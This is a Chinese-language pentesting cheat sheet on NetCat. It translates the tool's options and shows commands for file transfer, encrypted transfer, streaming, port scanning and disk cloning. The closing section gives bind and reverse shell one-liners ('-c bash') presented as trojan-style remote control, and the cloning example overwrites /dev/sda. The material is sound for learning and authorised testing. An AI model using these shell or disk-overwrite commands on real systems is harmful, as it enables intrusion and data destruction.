NetCat(NC)在渗透测试中的常见应用以及中文版参数解释

NetCat简称NC,是一款体积小巧但功能十分强大的网络工具,享有网络工具中的“瑞士军刀”之称,深得网络安全从业者的喜爱,在此我总结以下NetCat在渗透测试和部分其他情景下的使用方法:

1.作为文本传输工具

2.作为文件的传输工具

3.加密传输文件

4.加密数据流量

5.远程克隆硬盘

6.作为木马进行远程控制

7.作为流媒体服务器

参数中文对照

-d 后台模式

-e prog 程序重定向,一旦连接,就执行 [危险!!]

-g gateway source-routing hop point[s], upto 8

-G num source-routing pointer: 4, 8, 12,...

-h 帮助信息

-i secs 延时的间隔

-l 监听模式,用于入站连接

-L 连接关闭后,仍然继续监听

-n 指定数字的IP地址,不能用hostname

-o file 记录16进制的传输

-p port 本地端口号

-r 随机本地及远程端口

-s addr 本地源地址

-t 使用TELNET交互方式

-u UDP模式

-v 详细输出--用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉--用于扫描时

端口的表示法可写为M-N的范围格式。

NC-传输文本信息

A:nc -l -p 6666

B:nc -nv 1.1.1.1 6666

 

More Lsof

NC传输文件和目录

传输文件

A: nc -lp 333 > 1.txt

B: nc -nv 1.1.1.1 <1.txt

或者:

A: nc -lp 333 < 1.txt

B: nc -nv 1.1.1.1 >1.txt

传输目录

A:tar -cvf - music/ | nc -lp 333

B:nc -nv 1.1.1.1 333 | tar -xvf

传输加密文件

A:nc -lp 333 | mcrypt --flush -Fbqd -arjindael256 -m ecb >1.txt

B:mcrypt –flush -Fbq -a rjindael256 -m ecb| nc -nv 1.1.1.1 333

 

NC-流媒体服务

A:cat 1.mp4 | nc -lp 333

B: nc -nv 1.1.1.1 333 | mplayer -vo x11-cache 3000-

 

NC-端口扫描

nc -nvz 1.1.1.1 1-65535

nc -vnzu 1.1.1.1 1-1024

 

NC-远程克隆硬盘

A: nc -lp 333 | dd of=/dev/sda

B:dd if=/dev/sda |nc -nv 1.1.1.1 333

NC-远程控制

正向:

A:nc -lp 333 -c bash

B:nc 1.1.1.1 333

反向:

A: nc -lp 333

B: nc 1.1.1.1 333 -c bash

你可能感兴趣的:(Kali,Linux)